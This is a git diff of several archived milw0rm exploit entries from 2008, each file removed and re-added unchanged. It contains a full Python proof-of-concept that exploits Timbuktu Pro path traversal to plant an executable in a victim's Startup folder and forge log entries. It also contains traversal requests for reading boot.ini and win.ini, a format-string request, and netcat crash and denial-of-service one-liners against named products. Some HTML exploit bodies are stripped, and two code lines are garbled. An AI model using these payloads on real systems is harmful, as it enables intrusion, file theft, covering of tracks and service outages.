-#######################################################################
-
-======
-2) Bug
-======
-
-
-The TFTP Boot Server is affected by a classical directory traversal
-vulnerability which allows an attacker to download (upload is not
-allowed) any file from the disk where is located the tftp folder.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-http://aluigi.org/testz/tftpx.zip
-
-  tftpx SERVER ../../windows/win.ini none
-  tftpx SERVER ..\boot.ini none
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-No fix
-
-
-#######################################################################
-
-# milw0rm.com [2008-03-10]
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  Argon Client Management Services
+              http://www.argontechnology.com/product.aspx/cid1/43
+Versions:     <= 1.31 (TFTP Boot Server <= 2.5.3.1)
+Platforms:    Windows
+Bug:          directory traversal in TFTP Boot Server
+Exploitation: remote
+Date:         08 Mar 2008
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bug
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+>From vendor's website:
+"Client Management Services® (CMS) includes all the server-based
+services (PXE Server, BOOTP Server) and administration tools needed to
+setup an open network boot environment. You can deploy your favorite
+third party client management tools in a pre-OS booting phase."
+
+
+#######################################################################
+
+======
+2) Bug
+======
+
+
+The TFTP Boot Server is affected by a classical directory traversal
+vulnerability which allows an attacker to download (upload is not
+allowed) any file from the disk where is located the tftp folder.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+http://aluigi.org/testz/tftpx.zip
+
+  tftpx SERVER ../../windows/win.ini none
+  tftpx SERVER ..\boot.ini none
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+No fix
+
+
+#######################################################################
+
+# milw0rm.com [2008-03-10]
diff --git a/platforms/windows/remote/5238.py b/platforms/windows/remote/5238.py
index a33f5cada..94026eb06 100755
--- a/platforms/windows/remote/5238.py
+++ b/platforms/windows/remote/5238.py
@@ -1,274 +1,274 @@
-# Core Security Technologies - CoreLabs Advisory
-#  http://www.coresecurity.com/corelabs
-
-# Title: Timbuktu Pro Remote Path Traversal and Log Injection
-# Advisory ID: CORE-2008-0204
-# Advisory URL: http://www.coresecurity.com/?action=item&id=2166
-# Date published: 2008-03-11
-# Date of last update: 2008-03-11
-# Vendors contacted: Motorola
-# Release mode: Forced release
-
-#  Proof of concept code follows. This PoC allows a remote attacker to
-# upload a file to an arbitrary location on the victim's machine and forge
-# peer information on the log lines of the victim's application.
-
-from sys        import argv
-from socket     import *
-from struct     import pack
-
-#from utils      import printFormatted
-#from time import sleep
-
-init_send_op_packet =   (   '\x00\x01\x60\x00\x00\x52\x00\x25'
-                            '\x00\x22\x02\x01\x00\x04\x03\x07'
-                            '\x00\x05\x00\x01\x00\x00\x00\xf1'
-                            '\x06\x00\xf7\x76\xdd\x77\x00\x00'
-                            '\x00\x00\x08\x7c\x67\x60\x00\x00'
-                            '\x00\x00\x00\x00\x00\x00\x00\x00'
-                            '\x00\x00\x18\xf1\x06\x00\xd1\x90'
-                            '\xbc\x60\x38\xf1\x06\x00\x32\x94'
-                            '\xc1\x60\x50\x92\xc4\x60\x00\x00'
-                            '\x00\x00\x18\x92\xc4\x60\x2d\xbe'
-                            '\x80\x7c\x08\x7c\x67\x60\x20\x46'
-                        )
-
-second_send_op_packet  = (  '\x00\x01\x61\x00\x00\x52\x00\x25'
-                            '\x00\x22\x02\x01\x00\x04\x03\x07'
-                            '\x00\x05\x00\x01\x10\x00\xe0\xf0'
-                            '\x06\x00\x51\x05\x91\x7c\x28\x09'
-                            '\x08\x00\x6d\x05\x91\x7c\x1c\xf1'
-                            '\x06\x00\x02\x00\x00\x00\x10\x00'
-                            '\x00\x00\xb8\xf5\xbe\x60\x00\x00'
-                            '\xac\x00\x00\x00\x00\x00\xbd\xf5'
-                            '\xbe\x60\x30\x90\xc4\x60\x07\x00'
-                            '\x00\x00\xd0\x13\x63\x60\x71\xfb'
-                            '\x90\x7c\x40\xf0\x06\x00\x0e\x00'
-                            )
-
-peer_info_exchange      = ( '\x00\x01\x62\x00\x00\xb0\x00\x23'
-                            '\x07\x22\x03\x07\x70\x2c\xa5\x51'
-                            '\x4c\xca\xe3\xfb\x70\x2c\xa5\x51'
-                            '\x4c\xca\xe3\xfb\x00\x09'
-                            '%(user_name)s'
-                            '\x01\x97'
-                            '%(host_name)s'
-                            ''
-                            '\x00\x00\x01\x02\x00\x04'
-                            '\xb1\x1c\x39\x51\x00\x00\x00\x00'
-                            '%(guest_ip_address)s'
-                            '\x00\x00\x00\x00\x00\x00'
-                            '\x00\x00\x00\x00\x00\x00'
-                            )
-
-ack_peer_info           =   '\xff'
-
-attach_info_packet      = ('\xfb\x00\x00\x00\x00'
-                            'BINAmdos'
-                            '\xc2\x12\x49\xaf\xbd\x35\xac\x98'
-                            '\x00\x00\x00\x00'
-                            '%(attachment_length)s'
-                            '\x00\x00\x00\x00'
-                            '\xff\xff\xff\xff\x00\x00\x00\x00'
-                            '\x00\x00\x00\x00\x00\x00\x00\x00'
-                            '\x00\x00\x00\x00\x00\x00'
-                            '%(attachment_filename)s'
-                            )
-
-attach_info_ack1        =  '\xf9\x00'
-
-# Transfer file content here !!!
-# \xF8 + 2 byte length + data
-
-attach_file_ack1      =  '\xf7'
-
-attach_file_ack2      =  '\xfa'
-
-
-class Tb2FileSender:
-    '''
-    Fake timbuktu client that implements the 'Notes' feature to send a
-    message with a file attached to it.
-    '''
-
-    def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content):
-        '''
-        Setup TCP Connection to standard port TCP/407
-        '''
-        self.sck = socket(AF_INET, SOCK_STREAM)
-        self.sck.connect((target, 407))
-        self.fake_src_ip    = fake_src_ip
-        self.fake_hostname  = fake_hostname     # Peer computer name
-        self.fake_username  = fake_username     # Peer user name
-        self.dest_filename  = dest_filename     # Destination filename including path (like ../../a.exe)
-        self.file_content   = file_content      # Content of the destination file
-
-    def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False):
-        self.sck.send(packet)
-        if log:
-            print '[-] %s' % log
-        if expected_response_length > 0:
-            resp = self.sck.recv(expected_response_length)
-            if print_response:
-                #printFormatted(resp)
-                print '-' * 70 + '\n'
-            return resp
-        return None
-
-    def getPascalString(self, str):
-        '''
-        Format the strings as 1 Byte Length + String.
-        '''
-        return pack('B', len(str)) + str
-
-    def createFakePeerInfoPacket(self):
-        '''
-        Create a packet with forged guest information to avoid giving away
-        real info in the log files.
-        '''
-        #
-        # Ohhh... by the way, these two names goes diretly to the log file... ehehhee  :) 
-        #
-        guest_host_name      = self.fake_hostname.replace('\\n', '\r\n')
-        guest_user_name      = self.fake_username.replace('\\n', '\r\n')
-
-        username_max_len     = 0x37 # This is not the application real limit,
-        hostname_max_len     = 0x3f #   but it is the limit for this packet.
-
-        host_name            = self.getPascalString(guest_host_name)
-        user_name            = self.getPascalString(guest_user_name)
-
-        # Pad the string to fill the empty space and avoid packet length recalculation
-        host_name           += ('\x00' * (hostname_max_len - len(guest_host_name)))
-        user_name           += ('\x00' * (username_max_len - len(guest_user_name)))
-
-        guest_ip_address     = self.fake_src_ip.split('.')
-        guest_ip_address     = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3]))
-
-        return peer_info_exchange % vars()
-
-    def getAttachContent(self):
-        '''
-        Retrieve the content of the local file and send it as the attach content.
-        '''
-        fd      = open(self.file_content, 'rb')
-        data    = fd.read()
-        fd.close()
-        return data
-
-    def send(self):
-        '''
-        Send a sequence of packet to upload our data to the filename and path
-        specified by the user's parameters.
-        '''
-
-        # Begin protocol negotiation with the target
-        self.sendAndRecv(init_send_op_packet,               'Note Operation initial packet sent.')
-        self.sendAndRecv(second_send_op_packet,             'Note Operation negotiation packet sent.')
-
-        # Send the packet with our fake info to fool the logs  :) 
-        self.sendAndRecv(self.createFakePeerInfoPacket(),   'Peer info packet sent.')
-        self.sendAndRecv(ack_peer_info,                     'Ack peer info packet sent.')
-
-        # Setup attachment packets that contain information about the file being transfered
-        max_trx_chunk_size  = 0x5B4
-        trx_until_resync    = 0x16C5
-
-        payload             = self.getAttachContent()
-        payload_length      = len(payload)
-        attachment_length   = pack('>L', payload_length)
-
-        #
-        # Send info about the attachment.
-        #
-        # The '\' character is nedded to bypass the application filter.
-        # This is actually the Bug !
-        attachment_filename  = self.getPascalString('\\' + self.dest_filename.replace('\\', '/'))
-
-        attach_info          = attach_info_packet % vars()
-
-        self.sendAndRecv(attach_info     ,   'Attachment info sent.')
-        self.sendAndRecv(attach_info_ack1,   'Attachment intermediate info sent.')
-
-        # Create a list with the chunks to send and prepare their headers is appropriate
-        attachment_content   = list()
-
-        # We check if the data to send fits into one set of chunks.
-        if payload_length < max_trx_chunk_size:
-            attachment_content.append('\xF8' + pack('>H', payload_length) + payload)
-        else:
-            # If the data is bigger than one chunk, then send multiple chunks and their headers.
-            curr_pos        = 0     # keeps our current position into the data file content
-            resync_chunk    = True  # flag to indicate if a new set of chunk should be set
-            pos_in_chunk    = 0     # keeps our position into the current chunk set
-            do_recv         = False # flag to indicate if recv is needed to receive target data
-
-            while curr_pos <= payload_length:
-                do_recv      = False
-                # Is this the last chunk ?
-                if curr_pos > 0 and pos_in_chunk != trx_until_resync:
-                    # If it is the last chunk, then just set length to the rest of the data
-                    if trx_until_resync - pos_in_chunk < max_trx_chunk_size:
-                        chunk_length = trx_until_resync - pos_in_chunk
-                        do_recv = True
-                    else:
-                        # Otherwise, set the data length as usual because it's an intermediate chunk
-                        chunk_length = max_trx_chunk_size data         = ''
-                else:
-                    # Start a new set of chunks and check if this is not the last set
-                    # If it is, then don't set the maximun size, just the rest of the length.
-                    data         = '\xF8'   # Set the chunk set header
-                    if payload_length - curr_pos < trx_until_resync:
-                        chunk_length = payload_length - curr_pos
-                        data        += pack('>H', chunk_length)
-                    else:
-                        # This is not the last chunk, so we set the maximun size and begin
-                        #   it transmittion.
-                        chunk_length = max_trx_chunk_size
-                        data        += pack('>H', trx_until_resync) pos_in_chunk = 0
-
-                # Append the current chunk into a list to be sent later
-                attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length]))
-                curr_pos        += chunk_length
-                pos_in_chunk    += chunk_length
-
-        #
-        # Send file content in small chunks
-        #
-        print '[-] Beginning file transfer... (this may take some time)'
-        for chunk in attachment_content:
-            if chunk[0]:
-                do_recv = 0x500
-            else:
-                do_recv = 0
-            self.sendAndRecv(chunk[1], '', do_recv)
-            #sleep(0.5)
-        print '[-] File transfer complete'
-
-        # Send the final ACKs to allow the program to create the remote file.
-        self.sendAndRecv(attach_file_ack1,   'Note body intermediate info sent.')
-        self.sendAndRecv(attach_file_ack2,   'Note body intermediate info sent.')
-
-        # Close the connection here to avoid the program displaying any message
-        self.sck.close()
-        return
-
-
-if __name__ == "__main__":
-    if len(argv) != 7:
-        print (r'\nUsage:\n\n%s    '
-                '  \n\n'
-                'Example:\n\n'
-                '%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) )
-    else:
-        target          = argv[1]
-        fake_src_ip     = argv[2]
-        fake_hostname   = argv[3]
-        fake_username   = argv[4]
-        dest_filename   = argv[5]
-        file_content    = argv[6]
-
-        tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content)
-        tb2.send()
-
-# milw0rm.com [2008-03-11]
+# Core Security Technologies - CoreLabs Advisory
+#  http://www.coresecurity.com/corelabs
+
+# Title: Timbuktu Pro Remote Path Traversal and Log Injection
+# Advisory ID: CORE-2008-0204
+# Advisory URL: http://www.coresecurity.com/?action=item&id=2166
+# Date published: 2008-03-11
+# Date of last update: 2008-03-11
+# Vendors contacted: Motorola
+# Release mode: Forced release
+
+#  Proof of concept code follows. This PoC allows a remote attacker to
+# upload a file to an arbitrary location on the victim's machine and forge
+# peer information on the log lines of the victim's application.
+
+from sys        import argv
+from socket     import *
+from struct     import pack
+
+#from utils      import printFormatted
+#from time import sleep
+
+init_send_op_packet =   (   '\x00\x01\x60\x00\x00\x52\x00\x25'
+                            '\x00\x22\x02\x01\x00\x04\x03\x07'
+                            '\x00\x05\x00\x01\x00\x00\x00\xf1'
+                            '\x06\x00\xf7\x76\xdd\x77\x00\x00'
+                            '\x00\x00\x08\x7c\x67\x60\x00\x00'
+                            '\x00\x00\x00\x00\x00\x00\x00\x00'
+                            '\x00\x00\x18\xf1\x06\x00\xd1\x90'
+                            '\xbc\x60\x38\xf1\x06\x00\x32\x94'
+                            '\xc1\x60\x50\x92\xc4\x60\x00\x00'
+                            '\x00\x00\x18\x92\xc4\x60\x2d\xbe'
+                            '\x80\x7c\x08\x7c\x67\x60\x20\x46'
+                        )
+
+second_send_op_packet  = (  '\x00\x01\x61\x00\x00\x52\x00\x25'
+                            '\x00\x22\x02\x01\x00\x04\x03\x07'
+                            '\x00\x05\x00\x01\x10\x00\xe0\xf0'
+                            '\x06\x00\x51\x05\x91\x7c\x28\x09'
+                            '\x08\x00\x6d\x05\x91\x7c\x1c\xf1'
+                            '\x06\x00\x02\x00\x00\x00\x10\x00'
+                            '\x00\x00\xb8\xf5\xbe\x60\x00\x00'
+                            '\xac\x00\x00\x00\x00\x00\xbd\xf5'
+                            '\xbe\x60\x30\x90\xc4\x60\x07\x00'
+                            '\x00\x00\xd0\x13\x63\x60\x71\xfb'
+                            '\x90\x7c\x40\xf0\x06\x00\x0e\x00'
+                            )
+
+peer_info_exchange      = ( '\x00\x01\x62\x00\x00\xb0\x00\x23'
+                            '\x07\x22\x03\x07\x70\x2c\xa5\x51'
+                            '\x4c\xca\xe3\xfb\x70\x2c\xa5\x51'
+                            '\x4c\xca\xe3\xfb\x00\x09'
+                            '%(user_name)s'
+                            '\x01\x97'
+                            '%(host_name)s'
+                            ''
+                            '\x00\x00\x01\x02\x00\x04'
+                            '\xb1\x1c\x39\x51\x00\x00\x00\x00'
+                            '%(guest_ip_address)s'
+                            '\x00\x00\x00\x00\x00\x00'
+                            '\x00\x00\x00\x00\x00\x00'
+                            )
+
+ack_peer_info           =   '\xff'
+
+attach_info_packet      = ('\xfb\x00\x00\x00\x00'
+                            'BINAmdos'
+                            '\xc2\x12\x49\xaf\xbd\x35\xac\x98'
+                            '\x00\x00\x00\x00'
+                            '%(attachment_length)s'
+                            '\x00\x00\x00\x00'
+                            '\xff\xff\xff\xff\x00\x00\x00\x00'
+                            '\x00\x00\x00\x00\x00\x00\x00\x00'
+                            '\x00\x00\x00\x00\x00\x00'
+                            '%(attachment_filename)s'
+                            )
+
+attach_info_ack1        =  '\xf9\x00'
+
+# Transfer file content here !!!
+# \xF8 + 2 byte length + data
+
+attach_file_ack1      =  '\xf7'
+
+attach_file_ack2      =  '\xfa'
+
+
+class Tb2FileSender:
+    '''
+    Fake timbuktu client that implements the 'Notes' feature to send a
+    message with a file attached to it.
+    '''
+
+    def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content):
+        '''
+        Setup TCP Connection to standard port TCP/407
+        '''
+        self.sck = socket(AF_INET, SOCK_STREAM)
+        self.sck.connect((target, 407))
+        self.fake_src_ip    = fake_src_ip
+        self.fake_hostname  = fake_hostname     # Peer computer name
+        self.fake_username  = fake_username     # Peer user name
+        self.dest_filename  = dest_filename     # Destination filename including path (like ../../a.exe)
+        self.file_content   = file_content      # Content of the destination file
+
+    def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False):
+        self.sck.send(packet)
+        if log:
+            print '[-] %s' % log
+        if expected_response_length > 0:
+            resp = self.sck.recv(expected_response_length)
+            if print_response:
+                #printFormatted(resp)
+                print '-' * 70 + '\n'
+            return resp
+        return None
+
+    def getPascalString(self, str):
+        '''
+        Format the strings as 1 Byte Length + String.
+        '''
+        return pack('B', len(str)) + str
+
+    def createFakePeerInfoPacket(self):
+        '''
+        Create a packet with forged guest information to avoid giving away
+        real info in the log files.
+        '''
+        #
+        # Ohhh... by the way, these two names goes diretly to the log file... ehehhee  :) 
+        #
+        guest_host_name      = self.fake_hostname.replace('\\n', '\r\n')
+        guest_user_name      = self.fake_username.replace('\\n', '\r\n')
+
+        username_max_len     = 0x37 # This is not the application real limit,
+        hostname_max_len     = 0x3f #   but it is the limit for this packet.
+
+        host_name            = self.getPascalString(guest_host_name)
+        user_name            = self.getPascalString(guest_user_name)
+
+        # Pad the string to fill the empty space and avoid packet length recalculation
+        host_name           += ('\x00' * (hostname_max_len - len(guest_host_name)))
+        user_name           += ('\x00' * (username_max_len - len(guest_user_name)))
+
+        guest_ip_address     = self.fake_src_ip.split('.')
+        guest_ip_address     = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3]))
+
+        return peer_info_exchange % vars()
+
+    def getAttachContent(self):
+        '''
+        Retrieve the content of the local file and send it as the attach content.
+        '''
+        fd      = open(self.file_content, 'rb')
+        data    = fd.read()
+        fd.close()
+        return data
+
+    def send(self):
+        '''
+        Send a sequence of packet to upload our data to the filename and path
+        specified by the user's parameters.
+        '''
+
+        # Begin protocol negotiation with the target
+        self.sendAndRecv(init_send_op_packet,               'Note Operation initial packet sent.')
+        self.sendAndRecv(second_send_op_packet,             'Note Operation negotiation packet sent.')
+
+        # Send the packet with our fake info to fool the logs  :) 
+        self.sendAndRecv(self.createFakePeerInfoPacket(),   'Peer info packet sent.')
+        self.sendAndRecv(ack_peer_info,                     'Ack peer info packet sent.')
+
+        # Setup attachment packets that contain information about the file being transfered
+        max_trx_chunk_size  = 0x5B4
+        trx_until_resync    = 0x16C5
+
+        payload             = self.getAttachContent()
+        payload_length      = len(payload)
+        attachment_length   = pack('>L', payload_length)
+
+        #
+        # Send info about the attachment.
+        #
+        # The '\' character is nedded to bypass the application filter.
+        # This is actually the Bug !
+        attachment_filename  = self.getPascalString('\\' + self.dest_filename.replace('\\', '/'))
+
+        attach_info          = attach_info_packet % vars()
+
+        self.sendAndRecv(attach_info     ,   'Attachment info sent.')
+        self.sendAndRecv(attach_info_ack1,   'Attachment intermediate info sent.')
+
+        # Create a list with the chunks to send and prepare their headers is appropriate
+        attachment_content   = list()
+
+        # We check if the data to send fits into one set of chunks.
+        if payload_length < max_trx_chunk_size:
+            attachment_content.append('\xF8' + pack('>H', payload_length) + payload)
+        else:
+            # If the data is bigger than one chunk, then send multiple chunks and their headers.
+            curr_pos        = 0     # keeps our current position into the data file content
+            resync_chunk    = True  # flag to indicate if a new set of chunk should be set
+            pos_in_chunk    = 0     # keeps our position into the current chunk set
+            do_recv         = False # flag to indicate if recv is needed to receive target data
+
+            while curr_pos <= payload_length:
+                do_recv      = False
+                # Is this the last chunk ?
+                if curr_pos > 0 and pos_in_chunk != trx_until_resync:
+                    # If it is the last chunk, then just set length to the rest of the data
+                    if trx_until_resync - pos_in_chunk < max_trx_chunk_size:
+                        chunk_length = trx_until_resync - pos_in_chunk
+                        do_recv = True
+                    else:
+                        # Otherwise, set the data length as usual because it's an intermediate chunk
+                        chunk_length = max_trx_chunk_size data         = ''
+                else:
+                    # Start a new set of chunks and check if this is not the last set
+                    # If it is, then don't set the maximun size, just the rest of the length.
+                    data         = '\xF8'   # Set the chunk set header
+                    if payload_length - curr_pos < trx_until_resync:
+                        chunk_length = payload_length - curr_pos
+                        data        += pack('>H', chunk_length)
+                    else:
+                        # This is not the last chunk, so we set the maximun size and begin
+                        #   it transmittion.
+                        chunk_length = max_trx_chunk_size
+                        data        += pack('>H', trx_until_resync) pos_in_chunk = 0
+
+                # Append the current chunk into a list to be sent later
+                attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length]))
+                curr_pos        += chunk_length
+                pos_in_chunk    += chunk_length
+
+        #
+        # Send file content in small chunks
+        #
+        print '[-] Beginning file transfer... (this may take some time)'
+        for chunk in attachment_content:
+            if chunk[0]:
+                do_recv = 0x500
+            else:
+                do_recv = 0
+            self.sendAndRecv(chunk[1], '', do_recv)
+            #sleep(0.5)
+        print '[-] File transfer complete'
+
+        # Send the final ACKs to allow the program to create the remote file.
+        self.sendAndRecv(attach_file_ack1,   'Note body intermediate info sent.')
+        self.sendAndRecv(attach_file_ack2,   'Note body intermediate info sent.')
+
+        # Close the connection here to avoid the program displaying any message
+        self.sck.close()
+        return
+
+
+if __name__ == "__main__":
+    if len(argv) != 7:
+        print (r'\nUsage:\n\n%s    '
+                '  \n\n'
+                'Example:\n\n'
+                '%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) )
+    else:
+        target          = argv[1]
+        fake_src_ip     = argv[2]
+        fake_hostname   = argv[3]
+        fake_username   = argv[4]
+        dest_filename   = argv[5]
+        file_content    = argv[6]
+
+        tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content)
+        tb2.send()
+
+# milw0rm.com [2008-03-11]
diff --git a/platforms/windows/remote/5264.html b/platforms/windows/remote/5264.html
index d7ed62b5d..43f923230 100755
--- a/platforms/windows/remote/5264.html
+++ b/platforms/windows/remote/5264.html
@@ -1,67 +1,67 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-03-16]
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-03-16]
diff --git a/platforms/windows/remote/5269.txt b/platforms/windows/remote/5269.txt
index 75ab89857..bb676e3d5 100755
--- a/platforms/windows/remote/5269.txt
+++ b/platforms/windows/remote/5269.txt
@@ -1,130 +1,130 @@
-#######################################################################
-
-                             Luigi Auriemma
-
-Application:  MG-SOFT Net Inspector
-              http://www.mg-soft.com/netinsp.html
-              (bug C affects any MgWTrap3 service which is included in
-              almost all the MG-SOFT products like MIB Browser, Query
-              Manager, Trap Ringer Pro and so on)
-Versions:     Net Inspector <= 6.5.0.828
-Platforms:    Windows and Linux
-Bugs:         A] format string in mghttpd
-              B] directory traversal in mghttpd
-              C] crash in MgWTrap3
-              D] Denial of Service in niengine
-Exploitation: remote
-Date:         14 Mar 2008
-Author:       Luigi Auriemma
-              e-mail: aluigi@autistici.org
-              web:    aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bugs
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
->From vendor's website:
-"MG-SOFT Net Inspector is a powerful fault management application with
-alarming subsystem that complies with the international alarm reporting
-recommendations (ITU X.733). The software lets you effectively monitor
-the status of network devices and manage alarms associated with devices
-in the supervised TCP/IP network."
-
-
-#######################################################################
-
-=======
-2) Bugs
-=======
-
----------------------------
-A] format string in mghttpd
----------------------------
-
-mghttpd is a simple HTTP daemon running on port 5228 used to allow the
-clients to download the Net Inspector Java Client.
-This server is affected by a format string vulnerability located in the
-function which logs the clients requests in the log file.
-
-
----------------------------------
-B] directory traversal in mghttpd
----------------------------------
-
-This service is also affected by a classical directory traversal
-vulnerability using both the slash and backslash plain delimiters which
-can be exploited to download files from the disk on which is located
-the server.
-
-
---------------------
-C] crash in MgWTrap3
---------------------
-
-The SNMP Trap Service other than binding the local TCP port 8888 and
-the UDP 162 for collecting SNMP queries, binds also an additional UDP
-port which changes each time the service is executed (uses the first
-free available port).
-Sending a packet (empty or with any desired content since it's not
-important) directly to this port raises an exception which terminates
-the service immediately.
-This service is the core of almost all the MG-SOFT products which so
-result all vulnerable.
-
-
---------------------------------
-D] Denial of Service in niengine
---------------------------------
-
-The Net Inspector Fault Management server (niengine) can be easily
-freezed with CPU at 100% and full memory consumption through a
-malformed or incomplete packet.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-A]
-GET /%n%n%s%s%n%n%n%s HTTP/1.0
-
-B]
-GET ../../../../boot.ini HTTP/1.0
-GET \../..\../..\windows/win.ini HTTP/1.0
-
-C]
-echo|nc SERVER PORT -v -v -u
-
-D]
-echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-No fix
-
-
-#######################################################################
-
-# milw0rm.com [2008-03-17]
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  MG-SOFT Net Inspector
+              http://www.mg-soft.com/netinsp.html
+              (bug C affects any MgWTrap3 service which is included in
+              almost all the MG-SOFT products like MIB Browser, Query
+              Manager, Trap Ringer Pro and so on)
+Versions:     Net Inspector <= 6.5.0.828
+Platforms:    Windows and Linux
+Bugs:         A] format string in mghttpd
+              B] directory traversal in mghttpd
+              C] crash in MgWTrap3
+              D] Denial of Service in niengine
+Exploitation: remote
+Date:         14 Mar 2008
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bugs
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+>From vendor's website:
+"MG-SOFT Net Inspector is a powerful fault management application with
+alarming subsystem that complies with the international alarm reporting
+recommendations (ITU X.733). The software lets you effectively monitor
+the status of network devices and manage alarms associated with devices
+in the supervised TCP/IP network."
+
+
+#######################################################################
+
+=======
+2) Bugs
+=======
+
+---------------------------
+A] format string in mghttpd
+---------------------------
+
+mghttpd is a simple HTTP daemon running on port 5228 used to allow the
+clients to download the Net Inspector Java Client.
+This server is affected by a format string vulnerability located in the
+function which logs the clients requests in the log file.
+
+
+---------------------------------
+B] directory traversal in mghttpd
+---------------------------------
+
+This service is also affected by a classical directory traversal
+vulnerability using both the slash and backslash plain delimiters which
+can be exploited to download files from the disk on which is located
+the server.
+
+
+--------------------
+C] crash in MgWTrap3
+--------------------
+
+The SNMP Trap Service other than binding the local TCP port 8888 and
+the UDP 162 for collecting SNMP queries, binds also an additional UDP
+port which changes each time the service is executed (uses the first
+free available port).
+Sending a packet (empty or with any desired content since it's not
+important) directly to this port raises an exception which terminates
+the service immediately.
+This service is the core of almost all the MG-SOFT products which so
+result all vulnerable.
+
+
+--------------------------------
+D] Denial of Service in niengine
+--------------------------------
+
+The Net Inspector Fault Management server (niengine) can be easily
+freezed with CPU at 100% and full memory consumption through a
+malformed or incomplete packet.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+A]
+GET /%n%n%s%s%n%n%n%s HTTP/1.0
+
+B]
+GET ../../../../boot.ini HTTP/1.0
+GET \../..\../..\windows/win.ini HTTP/1.0
+
+C]
+echo|nc SERVER PORT -v -v -u
+
+D]
+echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+No fix
+
+
+#######################################################################
+
+# milw0rm.com [2008-03-17]
diff --git a/platforms/windows/remote/5332.html b/platforms/windows/remote/5332.html
index abfe63931..2041e0b2c 100755
--- a/platforms/windows/remote/5332.html
+++ b/platforms/windows/remote/5332.html
@@ -1,130 +1,130 @@
-
-
- 
-  Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
-  
-  
-  
-
- 
-	
-		Unable to create object
-	
-
- 
-
-
-# milw0rm.com [2008-04-01]
+
+
+ 
+  Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
+  
+  
+  
+
+ 
+	
+		Unable to create object
+	
+
+ 
+
+
+# milw0rm.com [2008-04-01]
diff --git a/platforms/windows/remote/5338.html b/platforms/windows/remote/5338.html
index 43d08157e..1b6be16d2 100755
--- a/platforms/windows/remote/5338.html
+++ b/platforms/windows/remote/5338.html
@@ -1,23 +1,23 @@
---------------------------------------------------------------------
- ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
- url: www.chilkatsoft.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
---------------------------------------------------------------------
-
-
-
-
-
-
-# milw0rm.com [2008-04-01]
+--------------------------------------------------------------------
+ ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
+ url: www.chilkatsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+--------------------------------------------------------------------
+
+
+
+
+
+
+# milw0rm.com [2008-04-01]
diff --git a/platforms/windows/remote/5395.html b/platforms/windows/remote/5395.html
index f91385026..63fc5e8c9 100755
--- a/platforms/windows/remote/5395.html
+++ b/platforms/windows/remote/5395.html
@@ -1,43 +1,43 @@
-
    -------------------------------------------------------------------------------------
- Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods
- url: http://www.datadynamics.com
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2008-04-07]
+
    +------------------------------------------------------------------------------------
+ Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods
+ url: http://www.datadynamics.com
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2008-04-07]
diff --git a/platforms/windows/remote/5397.txt b/platforms/windows/remote/5397.txt
index dc638b1ca..dda928bb6 100755
--- a/platforms/windows/remote/5397.txt
+++ b/platforms/windows/remote/5397.txt
@@ -1,61 +1,61 @@
